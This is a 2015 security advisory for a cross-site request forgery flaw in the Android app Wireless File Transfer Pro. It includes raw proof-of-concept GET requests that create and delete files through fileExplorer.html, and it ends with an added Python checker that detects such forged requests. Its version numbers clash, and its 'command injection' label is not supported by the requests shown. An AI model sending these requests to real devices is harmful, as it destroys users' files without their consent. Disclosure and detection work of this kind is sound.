Document Title:
===============
Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Create, Delete)

Release Date:
=============
2015-02-10

Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.

(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )

Affected Product(s):
====================
Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1
Lextel Technology

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Request Method(s):
[+] [GET]

Vulnerable Module(s):
[+] browse

Vulnerable Parameter(s):
[+] fileExplorer.html?

Affected Module(s):
[+] Index of Documents (http://localhost:8888)

Technical Details & Description:
================================
A cross-site request forgery vulnerability has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web application. The mobile web application is vulnerable to a combination of cross-site request forgery and local command injection: the create and delete actions of fileExplorer.html are executed on plain GET requests, so a page served from another origin can cause the user's browser to trigger them against the device's local web server.

Proof of Concept (PoC):
=======================
Create New Folder

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4

test12015-02-09 18:12:19

Delete File, Folder

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30

Reference:
http://localhost:8888/

Security Risk:
==============
The security risk of the cross-site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4)

Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr
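As an added example (not part of the original advisory or the vendor's code), a small Python checker that applies the two defensive criteria a reviewer would use on raw HTTP requests of the kind shown in the PoC logs: it flags state-changing fileExplorer.html actions issued via GET and compares the Origin/Referer host against the Host header. The second sample, with an other-site.example Referer, is a constructed value illustrating what a forged request looks like in a capture.

```python
from urllib.parse import urlsplit, parse_qs

# Query "action" values that change state on the device, taken from the PoC requests above.
STATE_CHANGING_ACTIONS = {"create", "deleteFile"}

def parse_request(raw):
    """Split a raw HTTP/1.1 request (request line plus headers) into method, target, headers."""
    head = raw.strip().split("\r\n\r\n", 1)[0]
    lines = head.replace("\r\n", "\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers

def assess_request(raw):
    """Return CSRF-related findings for one request; an empty list means nothing suspicious."""
    method, target, headers = parse_request(raw)
    parts = urlsplit(target)
    action = parse_qs(parts.query).get("action", [None])[0]
    findings = []
    if parts.path != "/fileExplorer.html" or action not in STATE_CHANGING_ACTIONS:
        return findings  # browse and other read-only actions are not in scope
    if method == "GET":
        findings.append("state-changing action '%s' issued via GET" % action)
    host = headers.get("host", "")
    source = headers.get("origin") or headers.get("referer")
    if source is None:
        findings.append("no Origin/Referer header: same-site origin cannot be confirmed")
    elif urlsplit(source).netloc != host:
        findings.append("cross-site source %s for Host %s" % (urlsplit(source).netloc, host))
    return findings

# Constructed sample: the create-folder request from the PoC log above (same-site Referer).
POC_CREATE = (
    "GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1\r\n"
    "Host: 192.168.1.2:8888\r\n"
    "Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard\r\n\r\n"
)
# Constructed sample: the delete request as it would appear when triggered from another site.
CROSS_SITE_DELETE = (
    "GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1\r\n"
    "Host: 192.168.1.2:8888\r\n"
    "Referer: http://other-site.example/page.html\r\n\r\n"
)

if __name__ == "__main__":
    print(assess_request(POC_CREATE), assess_request(CROSS_SITE_DELETE))
```

The same-site PoC request still yields a finding, because a state change on GET is the defect that makes the forgery possible regardless of where the request came from.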